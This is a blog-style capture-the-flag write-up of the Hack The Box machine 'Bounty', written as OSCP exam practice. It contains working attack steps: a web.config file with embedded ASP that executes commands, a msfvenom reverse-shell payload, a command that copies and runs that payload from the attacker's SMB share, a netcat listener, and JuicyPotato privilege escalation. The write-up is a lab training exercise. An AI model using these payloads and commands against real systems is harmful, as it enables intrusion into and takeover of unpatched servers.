Hack The Box: Bounty Write-up (#38)
This is my 38th box out of 45 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.
Reconnaissance
Run the nmapAutomator script to enumerate open ports and services running on those ports.
./nmapAutomater 10.10.10.93 All- All: Runs all the scans consecutively (~20–30 minutes)
We get the back the following result:
Running all scans on 10.10.10.93Host is likely running Windows---------------------Starting Nmap Quick Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:39 +08
Warning: 10.10.10.93 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.93
Host is up (0.0088s latency).
Not shown: 999 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 7.96 seconds---------------------Starting Nmap Basic Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:40 +08
Nmap scan report for 10.10.10.93
Host is up (0.0087s latency).PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.87 seconds----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:40 +08
Nmap scan report for 10.10.10.93
Host is up.
All 1000 scanned ports on 10.10.10.93 are open|filteredNmap done: 1 IP address (1 host up) scanned in 201.45 seconds---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:43 +08
Initiating Parallel DNS resolution of 1 host. at 07:43
Completed Parallel DNS resolution of 1 host. at 07:43, 0.20s elapsed
Initiating SYN Stealth Scan at 07:43
Scanning 10.10.10.93 [65535 ports]
Discovered open port 80/tcp on 10.10.10.93
SYN Stealth Scan Timing: About 11.44% done; ETC: 07:48 (0:04:00 remaining)
SYN Stealth Scan Timing: About 22.86% done; ETC: 07:47 (0:03:26 remaining)
SYN Stealth Scan Timing: About 34.29% done; ETC: 07:47 (0:02:54 remaining)
SYN Stealth Scan Timing: About 45.72% done; ETC: 07:47 (0:02:24 remaining)
SYN Stealth Scan Timing: About 57.14% done; ETC: 07:47 (0:01:53 remaining)
SYN Stealth Scan Timing: About 68.57% done; ETC: 07:47 (0:01:23 remaining)
SYN Stealth Scan Timing: About 80.00% done; ETC: 07:47 (0:00:53 remaining)
Completed SYN Stealth Scan at 07:47, 262.71s elapsed (65535 total ports)
Nmap scan report for 10.10.10.93
Host is up (0.0076s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
80/tcp open http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.98 seconds
Raw packets sent: 131275 (5.776MB) | Rcvd: 207 (9.108KB)No new ports---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:47 +08
Nmap scan report for 10.10.10.93
Host is up (0.0069s latency).PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.22 secondsRunning Vuln scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:48 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.93
Host is up (0.0083s latency).PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2015-1635:
| VULNERABLE:
| Remote Code Execution in HTTP.sys (MS15-034)
| State: VULNERABLE
| IDs: CVE:CVE-2015-1635
| A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is
| caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who
| successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
|
| Disclosure date: 2015-04-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 178.27 seconds---------------------Recon Recommendations----------------------Web Servers Recon:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.asp,.aspx,.php -u http://10.10.10.93:80 -o recon/gobuster_10.10.10.93_80.txt
nikto -host 10.10.10.93:80 | tee recon/nikto_10.10.10.93_80.txtWhich commands would you like to run?
All (Default), gobuster, nikto, Skip <!>Running Default in (21) s: All---------------------Running Recon Commands----------------------Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.93:80
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,asp,aspx,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/12 07:51:15 Starting gobuster
===============================================================
http://10.10.10.93:80/aspnet_client (Status: 301) [Size: 159]
http://10.10.10.93:80/transfer.aspx (Status: 200) [Size: 941]
http://10.10.10.93:80/uploadedfiles (Status: 301) [Size: 159]
===============================================================
2020/09/12 07:51:33 Finished
===============================================================Finished gobuster scan
=========================
Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.93
+ Target Hostname: 10.10.10.93
+ Target Port: 80
+ Start Time: 2020-09-12 07:51:34 (GMT8)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-09-12 07:52:51 (GMT8) (77 seconds)
---------------------------------------------------------------------------
+ 1 host(s) testedFinished nikto scan
=========================
---------------------Finished all Nmap scans---------------------
Only port 80 is open.
- Port 80: — Running Microsoft IIS httpd 7.5.
Before we begin, let’s make mental notes based on the scan results.
- The only open port is port 80. Surely this will be our entry point to the target. A quick Google search for IIS version 7.5 states that it is possibly running on Windows Server 2008 R2. Next, gobuster scan returned 2 interesting paths, /transfer.aspx and /uploadedfiles that are available on the web server. We’ll do manual enumeration to dig further.
Service Enumeration
Port 80 (HTTP)
Let’s visit the index page.
Just an image, nothing else. Check the page source for any sensitive information.
Nope, nothing interesting as well. Let’s visit the /transfer.aspx path.
We have file upload functionality. We’re not sure what file type or extension it will accept. We try to upload a PNG image file.
We get a “File uploaded successfully” message. We can view the uploaded file by visiting /uploadedfiles directory from the browser.
Great! In the same way, if we able to upload file contains ASPX or ASP code, we can get code execution. I have tested these 2 file extensions and they both returned me “Invalid File. Please try again” error message.
However, it does accepts the CONFIG file extension. Since this web application supports ASP or ASPX we can upload a web.config file. It is an XML based configuration file used in ASP.NET based application to manage various settings that concerned with the configuration of the website. A quick Google search for the “web.config upload rce” returned this link, explaining how you could get remote code execution by appending aspx code in web.config file.
So let’s test it out. Copy the code from the link above and save it in the web.config file. A little modification needed, you need to add ‘cmd /c’ just before the whoami command for the target to interpret the command properly.
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c whoami")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>Upload the file and visit it from /uploadedfiles directory.
Great! It executed the system command and we get user “bounty\merlin”. Before we move to a reverse shell, let’s run systeminfo command to get OS details which will be helpful to upload/execute correct OS architecture exploits in the later phase.
Replace the whoami command systeminfo.
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c systeminfo")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>Upload the file again and visit the /uploadedfiles directory.
As per our mental notes, this target’s OS is Windows Server 2008 R2 and the architecture is x64-bit. One more thing is, we can see no patches (Hotfix) installed. Meaning it has multiple vulnerabilities to exploit. Time to get a shell!
Exploitation
Generate a reverse shell payload.
msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=53 -o shell.exeNext, replace the ASPX code in web.config file with below code.
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c copy \\10.10.14.31\tools\shell.exe C:\Users\Public\shell.exe && cmd /c C:\Users\Public\shell.exe")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>We are telling the code to copy the shell.exe file from our SMB share and save it to C:\Users\Public directory in the target machine. Once finish copied, proceed to execute the shell.exe.
Now, set up a simple SMB share in the same directory where your web.config and shell.exe reside.
python /usr/share/doc/python3-impacket/examples/smbserver.py tools .Set up a Netcat listener in your Kali Linux.
nc -nlvp 53Upload the web.config file. Then visit /uploadedfiles directory. Go back the listener and see if we have received a shell.
We get a shell! Grab the user flag.
Post-Exploitation Enumeration
Let’s check the privilege of the user with the following command.
whoami /privWe get back the following results.
Merlin has SeImpersonatePrivilege privilege is set to enabled. This is good. We can use the token impersonation technique to escalate privilege to SYSTEM using an automated tool called JuicyPotato.
Privilege Escalation
Download JuicyPotato.exe x64-bit binary file from here and place in your SMB share. Always practice placing your recon stuff in your current working directory to make things easy.
Transfer the JuicyPotato.exe binary to the target machine and place in the same location as shell.exe.
copy \\10.10.14.31\tools\JuicyPotato.exe C:\Users\Public\JuicyPotato.exeFile copied.
Get your CSLID for Windows Server 2008 R2 from here.
Next, set up another Netcat listener in your Kali Linux.
nc -nlvp 53Then run the following command from the target machine.
JuicyPotato.exe -l 1337 -p C:\Users\Public\shell.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}Go back to the listener.
We’re SYSTEM! Grab the root flag.
Attack Strategy Map
I have summarized the entire attack strategy on this map.
Thank you for reading :-) Next box is Jerry.
